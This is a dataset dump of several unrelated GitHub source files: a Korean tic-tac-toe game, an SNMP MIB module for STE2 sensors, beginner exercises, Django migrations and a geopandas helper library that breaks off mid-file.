선공\n com_ans = input_COM(gameboard, com_ans, player_ans) # 컴퓨터의 입력\n if checkcom(com_ans): # 컴퓨터 승리 확인\n winner = 1 # 승리 시, winner에 1을 저장 후, break\n break\n if drawcheck(gameboard): # 비기는 경우 체크\n winner = 2 # 비겼을 시, winner에 2를 저장후, break\n break\n player_ans = input_player(gameboard, player_ans) # 플레이어의 입력\n if checkplayer(player_ans): # 플레이어의 승리 확인\n break # 승리 시, winner는 여전히 0, break\n\n else: # 모두 동일하나, 플레이어의 선공\n player_ans = input_player(gameboard, player_ans)\n if checkplayer(player_ans):\n break\n if drawcheck(gameboard):\n winner = 2\n break\n com_ans = input_COM(gameboard, com_ans, player_ans)\n if checkcom(com_ans):\n winner = 1\n break\n\n return winner # winner 변수 리턴\n\n\nplayer = intro()\n\n# 플레이어의 반대로 컴퓨터의 마크 결정\n\nif player == 'O':\n com = 'X'\nelse:\n com = 'O'\n\nwhile True:\n if player == 'X':\n printgameboard(gameboard)\n whowin = maindish() # 누구의 승리인지, 비긴 건지 확인\n if whowin == 0: # 0에서 플레이어의 승리\n print(\"YOU WIN!!!\")\n win += 1\n elif whowin == 1: # 1에서 컴퓨터의 승리\n print(\"YOU LOSE!!\")\n lose += 1\n else: # 2에서 비김\n print(\"DRAW!!\")\n win += 1\n lose += 1\n\n print(\"승률: %2f %%\" % ((win / (win + lose)) * 100)) # 승률 계산\n\n if not playagain(): # 게임 더 할지 결정\n break\n\n # 게임 판 다시 초기화\n\n gameboard = []\n\n for i in range(9):\n gameboard.append('-')\n","repo_name":"kadragon/oop_python_ex","sub_path":"student_result/2019/02_tictaetoe/tictactoe [2-5 오A].py","file_name":"tictactoe [2-5 오A].py","file_ext":"py","file_size_in_byte":8639,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"6805512499","text":"#\n# PySNMP MIB module STE2-MIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/STE2-MIB\n# Produced by pysmi-0.3.4 at Wed May 1 15:11:08 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) \n#\nOctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols(\"ASN1\", \"OctetString\", \"Integer\", \"ObjectIdentifier\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"ValueRangeConstraint\", \"SingleValueConstraint\", \"ValueSizeConstraint\", \"ConstraintsIntersection\", \"ConstraintsUnion\")\nNotificationGroup, ModuleCompliance = mibBuilder.importSymbols(\"SNMPv2-CONF\", 
\"NotificationGroup\", \"ModuleCompliance\")\nIpAddress, ModuleIdentity, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, Bits, Unsigned32, iso, ObjectIdentity, TimeTicks, Integer32, MibIdentifier, Gauge32, NotificationType, Counter32 = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"IpAddress\", \"ModuleIdentity\", \"Counter64\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"enterprises\", \"Bits\", \"Unsigned32\", \"iso\", \"ObjectIdentity\", \"TimeTicks\", \"Integer32\", \"MibIdentifier\", \"Gauge32\", \"NotificationType\", \"Counter32\")\nDisplayString, TextualConvention = mibBuilder.importSymbols(\"SNMPv2-TC\", \"DisplayString\", \"TextualConvention\")\nclass PositiveInteger(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 2147483647)\n\nclass UnitType(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))\n namedValues = NamedValues((\"none\", 0), (\"celsius\", 1), (\"fahrenheit\", 2), (\"kelvin\", 3), (\"percent\", 4))\n\nclass OnOff(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))\n namedValues = NamedValues((\"off\", 0), (\"on\", 1))\n\nclass InputAlarmState(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))\n namedValues = NamedValues((\"normal\", 0), (\"alarm\", 1))\n\nclass IOName(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 16)\n\nclass SensorState(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))\n namedValues = NamedValues((\"invalid\", 0), (\"normal\", 1), (\"outofrangelo\", 2), (\"outofrangehi\", 3), (\"alarmlo\", 4), (\"alarmhi\", 5))\n\nclass SensorSN(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 16)\n\nclass SensorName(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 16)\n\nclass SensorValue(Integer32):\n pass\n\nclass SensorID(Integer32):\n pass\n\nclass SensorString(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 10)\n\nhwgroup = MibIdentifier((1, 3, 6, 1, 4, 1, 21796))\nx390 = MibIdentifier((1, 3, 6, 1, 4, 1, 21796, 4))\nste2 = MibIdentifier((1, 3, 6, 1, 4, 1, 21796, 4, 9))\ninfo = MibIdentifier((1, 3, 6, 1, 4, 1, 21796, 4, 9, 70))\ninfoAddressMAC = MibScalar((1, 3, 6, 1, 4, 1, 21796, 4, 9, 70, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 17))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: infoAddressMAC.setStatus('mandatory')\nif mibBuilder.loadTexts: infoAddressMAC.setDescription('MAC address in text form. 
It is here to distinguish devices in trap messages.')\ninpTable = MibTable((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1), )\nif mibBuilder.loadTexts: inpTable.setStatus('mandatory')\nif mibBuilder.loadTexts: inpTable.setDescription('A list of binary input entries.')\ninpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1), ).setIndexNames((0, \"STE2-MIB\", \"inpIndex\"))\nif mibBuilder.loadTexts: inpEntry.setStatus('mandatory')\nif mibBuilder.loadTexts: inpEntry.setDescription('An entry containing information applicable to a particular binary input.')\ninpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 1), PositiveInteger())\nif mibBuilder.loadTexts: inpIndex.setStatus('mandatory')\nif mibBuilder.loadTexts: inpIndex.setDescription('The binary input index.')\ninpValue = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 2), OnOff()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: inpValue.setStatus('mandatory')\nif mibBuilder.loadTexts: inpValue.setDescription('The binary input value.')\ninpName = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 3), IOName()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: inpName.setStatus('mandatory')\nif mibBuilder.loadTexts: inpName.setDescription('The binary input name.')\ninpAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 4), InputAlarmState()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: inpAlarmState.setStatus('mandatory')\nif mibBuilder.loadTexts: inpAlarmState.setDescription('The binary input alarm state.')\nsensTable = MibTable((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3), )\nif mibBuilder.loadTexts: sensTable.setStatus('mandatory')\nif mibBuilder.loadTexts: sensTable.setDescription('A list of sensor table entries. The number of entries corresponds with number of detected sensors.')\nsensEntry = MibTableRow((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1), ).setIndexNames((0, \"STE2-MIB\", \"sensIndex\"))\nif mibBuilder.loadTexts: sensEntry.setStatus('mandatory')\nif mibBuilder.loadTexts: sensEntry.setDescription('An entry containing information applicable to a particular sensor.')\nsensIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 1), PositiveInteger())\nif mibBuilder.loadTexts: sensIndex.setStatus('mandatory')\nif mibBuilder.loadTexts: sensIndex.setDescription('The sensor index.')\nsensName = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 2), SensorName()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensName.setStatus('mandatory')\nif mibBuilder.loadTexts: sensName.setDescription('The sensor name.')\nsensState = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 3), SensorState()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensState.setStatus('mandatory')\nif mibBuilder.loadTexts: sensState.setDescription('The sensor state.')\nsensString = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 4), SensorString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensString.setStatus('mandatory')\nif mibBuilder.loadTexts: sensString.setDescription('The string representation of sensor value.')\nsensValue = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 5), SensorValue()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensValue.setStatus('mandatory')\nif mibBuilder.loadTexts: sensValue.setDescription('The integer (decimal * 10) representation of sensor value.')\nsensSN = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 6), SensorSN()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensSN.setStatus('mandatory')\nif mibBuilder.loadTexts: 
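`sensValue` above is documented as the decimal reading times ten, with the unit reported separately through the UnitType codes defined earlier (1 = celsius, 2 = fahrenheit, 3 = kelvin, 4 = percent). A tiny decoder for a polled row, assuming those conventions:

```python
# Decode a raw sensValue/sensUnit pair per the descriptions above.
UNITS = {0: "", 1: "degC", 2: "degF", 3: "K", 4: "%"}

def decode_sensor(raw_value, unit_code):
    return "%.1f %s" % (raw_value / 10.0, UNITS.get(unit_code, "?"))

print(decode_sensor(215, 1))  # 21.5 degC
```

Worth noting for anyone regenerating this MIB: the `sensID` column above is declared with `UnitType()` rather than the `SensorID` textual convention defined at the top of the module.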
sensSN.setDescription('The sensor Serial number.')\nsensUnit = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 7), UnitType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensUnit.setStatus('mandatory')\nif mibBuilder.loadTexts: sensUnit.setDescription('The sensor unit.')\nsensID = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 8), UnitType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensID.setStatus('mandatory')\nif mibBuilder.loadTexts: sensID.setDescription('The sensor ID.')\nmibBuilder.exportSymbols(\"STE2-MIB\", infoAddressMAC=infoAddressMAC, inpIndex=inpIndex, sensUnit=sensUnit, sensIndex=sensIndex, sensString=sensString, ste2=ste2, OnOff=OnOff, info=info, SensorValue=SensorValue, sensName=sensName, inpName=inpName, InputAlarmState=InputAlarmState, SensorState=SensorState, sensSN=sensSN, inpTable=inpTable, sensEntry=sensEntry, sensID=sensID, hwgroup=hwgroup, IOName=IOName, x390=x390, sensTable=sensTable, SensorString=SensorString, inpValue=inpValue, SensorID=SensorID, SensorName=SensorName, inpEntry=inpEntry, SensorSN=SensorSN, UnitType=UnitType, PositiveInteger=PositiveInteger, sensValue=sensValue, inpAlarmState=inpAlarmState, sensState=sensState)\n","repo_name":"cisco-kusanagi/mibs.snmplabs.com","sub_path":"pysnmp-with-texts/STE2-MIB.py","file_name":"STE2-MIB.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"9935701291","text":"#Print the prime numbers which are between 1 to entered limit number (n).\n\nlist_len = int(input(\"Enter a number : \"))\nprime_num = []\nfor i in range(1, list_len):\n is_prime = True\n for j in range(2,i):\n if i % j == 0:\n is_prime = False\n break\n if is_prime:\n prime_num.append(i)\nprint(prime_num)","repo_name":"MarkOneil7574/Assignments","sub_path":"Assignment_6_Prime_Numbers_List.py","file_name":"Assignment_6_Prime_Numbers_List.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11169023341","text":"\"\"\"\nCreate a function mispelled(word1, word2):\n\nmispelled('versed', 'xersed') # returns True\nmispelled('versed', 'applb') # returns False\nmispelled('versed', 'v5rsed') # returns True\nmispelled('1versed', 'versed') # returns True\nmispelled('versed', 'versed') #returns True \nIt checks if the word2 differs from word1 by at most one character.\n\nThis can include an extra char at the end or the beginning of either of words.\n\nIn the tests that expect true, the mispelled word will always differ mostly by one character. 
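A note on the prime-list snippet above: its outer loop starts at 1, and because `range(2, 1)` is empty, 1 survives the inner test and is reported as prime. Starting from 2, and stopping trial division at the square root, fixes that:

```python
# Corrected variant: excludes 1 and trial-divides only up to sqrt(i).
def primes_below(n):
    out = []
    for i in range(2, n):
        if all(i % j for j in range(2, int(i ** 0.5) + 1)):
            out.append(i)
    return out

print(primes_below(20))  # [2, 3, 5, 7, 11, 13, 17, 19]
```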
If the two words are the same, return True.\n\n\"\"\"\n\n# my solution\ndef mispelled(word1,word2):\n if len(word1) == len(word2):\n count = 0\n for i in range(len(word1)):\n if word1[i] != word2[i]:\n count += 1\n return count <= 1\n if len(word1) > len(word2):\n if word1[1:] == word2 or word1[:-1] == word2: return True\n else: return False\n if len(word2) > len(word1):\n if word2[1:] == word1 or word2[:-1] == word1: return True\n else: return False\n\n# other clever solution\n\ndef mispelled(word1, word2):\n l1, l2 = len(word1), len(word2)\n if l1 == l2:\n return sum(1 for a, b in zip(word1, word2) if a != b) <= 1\n if l1 - l2 == 1:\n return word1.startswith(word2) or word1.endswith(word2)\n if l1 - l2 == -1:\n return word2.startswith(word1) or word2.endswith(word1)\n return False","repo_name":"burd5/codewars_python","sub_path":"mispelled_word.py","file_name":"mispelled_word.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37430656748","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Categoria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=140)),\n ],\n ),\n migrations.CreateModel(\n name='Huerto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=140)),\n ('seguidores', models.IntegerField(default=0)),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Publicacion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=140)),\n ('votos', models.IntegerField(default=0)),\n ('favoritos', models.IntegerField(default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('imagen', models.ImageField(null=True, upload_to=b'media/', blank=True)),\n ('categoria', models.ForeignKey(to='Feed.Categoria')),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"LagunaISW/Midori","sub_path":"Feed/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40529716973","text":"def solution(img):\n size=64\n shape = [len(img[0]), len(img)]\n if shape[0] != shape[1]:\n print(\"Please enter a square image\")\n return\n dim = shape[0]\n if size < dim:\n print(\"Please enter a size greater than the original image\")\n return\n new_image = []\n growth_factor = int(size / dim)\n for row in img:\n new_row = []\n for pix in row:\n for _ in range(growth_factor):\n new_row.append(pix)\n for _ in range(growth_factor):\n new_image.append(new_row)\n return new_image","repo_name":"banana-galaxy/challenges","sub_path":"challenge1/gaba.py","file_name":"gaba.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"31562437887","text":"# -*- coding: utf-8 -*-\nfrom __future__ import 
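The second `mispelled` solution above handles the two length-difference branches symmetrically; folding them together with `abs()` and re-running the docstring cases gives a compact check:

```python
# Folded variant of the zip-based solution, verified against the docstring.
def mispelled(word1, word2):
    l1, l2 = len(word1), len(word2)
    if l1 == l2:
        return sum(a != b for a, b in zip(word1, word2)) <= 1
    if abs(l1 - l2) == 1:
        longer, shorter = (word1, word2) if l1 > l2 else (word2, word1)
        return longer.startswith(shorter) or longer.endswith(shorter)
    return False

cases = [
    ("versed", "xersed", True),
    ("versed", "applb", False),
    ("versed", "v5rsed", True),
    ("1versed", "versed", True),
    ("versed", "versed", True),
]
for w1, w2, expected in cases:
    assert mispelled(w1, w2) == expected, (w1, w2)
print("all docstring cases pass")
```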
unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"msgs\", \"0012_message_labels\")]\n\n operations = [\n migrations.AlterField(\n model_name=\"label\",\n name=\"org\",\n field=models.ForeignKey(\n related_name=\"labels\", verbose_name=\"Organization\", to=\"orgs.Org\", on_delete=models.PROTECT\n ),\n )\n ]\n","repo_name":"rapidpro/casepro","sub_path":"casepro/msgs/migrations/0013_auto_20160223_0917.py","file_name":"0013_auto_20160223_0917.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"35"} +{"seq_id":"39587689737","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import table\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport geopandas as gp\nimport shapely\nfrom shapely.geometry import Point,LineString,Polygon,MultiPolygon\nfrom scipy.spatial import cKDTree\n\n# from osgeo import ogr\n# from osgeo import gdal,ogr,osr,gdalnumeric\nimport shapefile as shp # Requires the pyshp package\nimport matplotlib.pyplot as plt\n\nimport contextily as ctx\n\ncrs = {'init':'epsg:4326'}\nctxprovider=ctx.sources.OSM_A\n\n''' Working with Points \n Some of these can be lambda for apply/map functions \n '''\ndef pt2geom(fdf,latcol='LAT',lngcol='LONG'):\n geometry = [Point(xy) for xy in zip(pd.to_numeric(fdf[lngcol]),pd.to_numeric(fdf[latcol]))]\n return geometry\n\ndef strpt2shapelypt(strin):\n if isinstance(strin,Point):\n return strin\n tlst = strin.split(' ')\n lng = float(tlst[1].replace('(',''))\n lat = float(tlst[2].replace(')',''))\n pt = Point(lng,lat)\n return pt\n\ndef strply2shapelyply(cell): # map: lambda cell has string Polygon\n if isinstance(cell,str):\n return shapely.wkt.loads(cell)\n else:\n return cell\n \ndef str2shapely(cell): # map: lambda cell has string Polygon or Point\n try:\n if isinstance(cell,str):\n # print(cell)\n if 'POINT' in cell:\n return strpt2shapelypt(cell)\n elif 'POLYGON' in cell:\n return strply2shapelyply(cell)\n else:\n print(\"Unknown Type: %s\" % cell)\n return np.nan\n elif np.isnan(cell):\n return cell\n else:\n print(\"Not String: {} {}\".format(cell,type(cell)))\n except:\n# print(\"Not String: {} {}\".format(cell,type(cell)))\n pass\n return cell\n\ndef flt2shapelypt(fdf,loncol=None,latcol=None): # Longitude first\n return Point(fdf[loncol],fdf[latcol])\n\ndef strpts2dist(fpt1,fpt2): # Distance in miles\n fdf = dfptstr2geom(pd.DataFrame([pt1,pt2],columns=['geometry'])).reset_index()\n fgp = df2gp(fdf,geom=fdf['geometry'])\n fdist = geodist(fgp)\n return fdist\n\ndef shapelypt2strpt(ptin):\n return ptin if isinstance(ptin,str) else str(ptin)\n\n''' Working with DataFrames '''\ndef dfstr2shapely(fdf,subset=['geometry']):\n for col in subset:\n fdf[col] = fdf[col].map(str2shapely)\n return fdf\ndef dfptstr2geom(fdf):\n geometry = fdf['geometry'].map(strpt2shapelypt)\n return geometry\n\ndef dfstrgeom2ptgeom(fdf):\n fdf['geometry']= dfptstr2geom(fdf)\n return fdf\n\ndef df2gp(fdf,geometry=None):\n if geometry is None:\n geometry = fdf['geometry']\n if isinstance(geometry.iloc[0], str):\n geometry = geometry.map(str2shapely)\n return gp.GeoDataFrame(fdf,crs=crs,geometry=geometry)\n\n''' Working with GeoPandas '''\ndef geodist(gpdf): # in miles\n ''' Distance between two adjacent rows '''\n gpdf = gpdf.to_crs(epsg=3310)\n dist = gpdf.distance(gpdf.shift()) * 0.00062137\n return (dist)\n\ndef 
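`strpt2shapelypt` above parses `"POINT (lng lat)"` strings by hand; shapely's WKT loader, which `str2shapely` already falls back to for polygons, covers both geometry types in one call:

```python
# shapely.wkt.loads handles both POINT and POLYGON strings directly.
import shapely.wkt
from shapely.geometry import Point

pt = shapely.wkt.loads("POINT (-122.42 37.77)")
assert isinstance(pt, Point) and (pt.x, pt.y) == (-122.42, 37.77)

poly = shapely.wkt.loads("POLYGON ((0 0, 1 0, 1 1, 0 0))")
print(poly.area)  # 0.5
```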
geodist2(gpdf,col1='geometry',col2=None): # in miles\n ''' Distance between two geometry columns '''\n fgp = gpdf.copy()\n fgp1 = fgp.to_crs(epsg=3310)\n fgp[col1] = fgp[col2]\n fgp2 = fgp.to_crs(epsg=3310)\n dist = fgp1.distance(fgp2) * 0.00062137\n return (dist)\n\ndef findnearest(fdfA, fdfB,k=1,units='mile'):\n ''' Finds the nearest K points to each row of fdfA from fdfB \n Returns a pandas dataframe not a geopandas dataframe '''\n gdA = fdfA.copy().reset_index()\n gdB = fdfB.copy().reset_index()\n nA = np.array(list(zip(gdA.geometry.x, gdA.geometry.y)) )\n nB = np.array(list(zip(gdB.geometry.x, gdB.geometry.y)) )\n \n ''' Find Nearest '''\n btree = cKDTree(nB)\n distlst, idxlst = btree.query(nA, k=k)\n \n ''' Join with fdfA '''\n distcols = [\"Dist_NEAR{}\".format(ii) for ii in range(0,k)] \n distdf = pd.DataFrame(distlst,columns=distcols)\n if units == 'mile': # default radians\n distdf[distcols] = distdf[distcols].apply(lambda col: col*66) # convert to miles\n idxcols = [\"NEAR{}\".format(ii) for ii in range(0,k)] \n idxdf = pd.DataFrame(idxlst,columns=idxcols)\n gdf = pd.concat([gdA.reset_index(drop=True),distdf,idxdf],axis=1)\n gdB = gdB.drop(columns=['index']).reset_index()\n gdBcol = gdB.columns\n for nearcol in idxcols:\n gdC = gdB.copy()\n gdC.columns = gdC.columns.map(lambda col: str(col) + '_' + nearcol) # force suffix\n gdf = gdf.set_index(nearcol).join(gdC) \\\n .reset_index().rename(columns={'level_0':nearcol})\n gdf = gdf.drop(columns=idxcols + ['index'])\n \n ''' Clean-up '''\n for var in [gdA,gdB,gdC,nA,nB,distdf,idxdf,distlst,idxlst]:\n del var\n\n return gdf\n\n''' GeoPandas Plotting '''\ngp_deffont = {'fontweight':'ultralight','color':'blue','size':16,'fontfamily':'cursive','style':'normal'}\ndef gp_getDefFont(): # Use if you want to change some of the options\n return gp_deffont\ndef gp_setAxesScales(ax,xscaledict={},yscaledict={},option=None,**kwargs): # TODO x and y limits\n if not option is None:\n ax.axis(option)\ndef gp_setAxesLabels(ax,xlabel='',ylabel='',font = {'size':16}):\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\ndef gp_setTitle(ax,title,**kwargs):\n ax.set_title(title,**kwargs)\ndef getPolygon(bnddf):\n return Polygon([(p.x,p.y) for p in bnddf['geometry']])\ndef getPolygonXY(bnddf):\n return getPolygon(bnddf).exterior.xy\n\ndef getCentroid(row): # Apply-Lambda\n geom = row.geometry\n if isinstance(geom, Polygon):\n# print(\"Is Polygon\",geom.centroid)\n return geom.centroid\n else:\n return np.nan\n\ndef getPointXY(ptdf):\n x = ptdf['geometry'].x\n y = ptdf['geometry'].y\n return x,y\ndef plot_points(ptdf,ax,s=50,**kwargs):\n x,y = getPointXY(ptdf)\n ax.scatter(x,y,s=s,alpha=0.5,**kwargs)\ndef plot_poly_boundary(bnddf,ax,**kwargs):\n x,y = getPolygonXY(bnddf)\n ax.plot(x,y)\n \ndef gp_scatterplot(fgp,ax = None,ptype='Points',mapon=False,figsize=(10,10),ctxprovider=ctxprovider,**kwargs):\n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n plot_points(fgp,ax)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\ndef gp_plot_poly_boundary(fgp,ax=None,figsize=(10,10),mapon=True,ctxprovider=ctxprovider,**kwargs):\n ''' fgp geometry is list of points containing the boundary '''\n if mapon:\n fgp = fgp.to_crs(epsg=3857) \n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n x,y = getPolygonXY(fgp)\n ax.plot(x,y)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_getInside(cell, pgp,col):\n ''' Find which polygon a point is in. 
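The heart of `findnearest` above is a single cKDTree query; a stripped-down sketch on plain coordinate arrays. (The module's `* 66` factor is a rough degrees-to-miles conversion that only holds for small, mid-latitude extents.)

```python
# One cKDTree query: for each row of pts_a, the nearest row of pts_b.
import numpy as np
from scipy.spatial import cKDTree

pts_a = np.array([[0.0, 0.0], [1.0, 1.0]])   # query points (lon, lat)
pts_b = np.array([[0.1, 0.0], [5.0, 5.0]])   # candidate points

tree = cKDTree(pts_b)
dist, idx = tree.query(pts_a, k=1)
print(idx)        # [0 0] -> index of nearest pts_b row per pts_a row
print(dist * 66)  # approximate miles, per the module's rough factor
```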
cell is a point, pgp is a gp of polygons and keys, \n col is the column containing the key value in pgp '''\n lz = np.nan\n lz = pgp.apply(lambda row: row[col] if cell.within(row['geometry']) else lz,axis=1).dropna()\n if lz.shape[0] > 1:\n dumpdf(lz)\n if lz.shape[0] == 0:\n return np.nan\n return lz.iloc[0]\n\ndef getPolyXY(poly):\n if isinstance(poly,Polygon):\n return [(poly.exterior.xy)]\n if isinstance(poly,MultiPolygon):\n subpolyXYlst = []\n for subpoly in poly:\n x,y = subpoly.exterior.xy\n subpolyXYlst.append((x,y))\n return subpolyXYlst\n else:\n print(\"isnot polygon\")\n print(type(poly),poly)\n return [(np.nan,np.nan)]\ndef plotPoly(row,ax,**kwargs): # Lambda\n xylst = getPolyXY(row['geometry'])\n for tup in xylst: # Single tuple for Polygon, multiple tuple for multipolygon\n x = tup[0]\n y = tup[1]\n if x != np.nan:\n ax.plot(x,y,**kwargs)\ndef gp_plotPoly(fgp,mapon=False, ax=None,figsize=(10,10),ctxprovider=ctxprovider,**kwargs): \n ''' GeoPandas DataFrame with 'geometry' containing Polygons '''\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111) \n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n devnull = fgp.apply(plotPoly,ax=ax,**kwargs,axis=1)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_plotPoint(fgp,ax,s=50,alpha=0.5,**kwargs): # Lambda\n x,y = getPointXY(fgp)\n ax.scatter(x,y,s=s,alpha=alpha,**kwargs)\ndef gp_plotPoints(fgp,ax = None,ptype='Points',mapon=False, title=None,\n figsize=(10,10),ctxprovider=ctxprovider,**kwargs):\n ''' GeoPandas DataFrame with 'geometry'containing Points '''\n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n gp_plotPoint(fgp,ax,**kwargs)\n gp_setAxesScales(ax,option=False)\n if not title is None:\n gp_setTitle(ax,title)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\ndef gp_plotLines(fgp,ax = None,geocol='geometry',ptype='Lines',mapon=False, title=None,\n figsize=(10,10),ctxprovider=ctxprovider,**kwargs):\n ''' GeoPandas DataFrame with 'geometry' containing LineStrings '''\n ''' Note: color parameter is 'color' '''\n if geocol != 'geometry':\n fgp['geometry'] = fgp[geocol] \n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n ax = fgp.plot(axes=ax,**kwargs)\n gp_setAxesScales(ax,option=False)\n if not title is None:\n gp_setTitle(ax,title)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_Points2Lines(fgp):\n fgp['geometryshift'] = fgp['geometry'].shift(-1)\n fgp = fgp.dropna()\n return fgp.apply(lambda row: LineString([row['geometry'],row['geometryshift']]), axis = 1)\n \ndef gp_getMarkerSize(ser,maxsize=1000,minsize=30): # Return normalized marker series\n sermax = ser.max()\n retser = ser.map(lambda cell: max(minsize, cell*maxsize/sermax))\n return retser\ndef gp_getCentroid(fdf): # Lambda\n return fdf['geometry'].map(getCentroidPoly)\n# return row.geometry.centroid if isinstance(row.geometry, Polygon) else np.nan\n\n''' Point Labels '''\ndef makeLabel(row,delimiter=', ',labelcol=[],**kwds): # Apply-Lambda\n retlab = ''\n for col in labelcol:\n colval = str(row[col])\n retlab += colval + delimiter\n retlab = retlab[:-2] # remove trailing delimiter and space\n return retlab\ndef gp_plotLabel(row,ax=None,xoffset=5000,yoffset=0,**kwds): # Apply-Lambda\n x,y=getPointXY(row)\n ax.text(x+xoffset,y+yoffset,row['label'],**kwds)\n\ndef 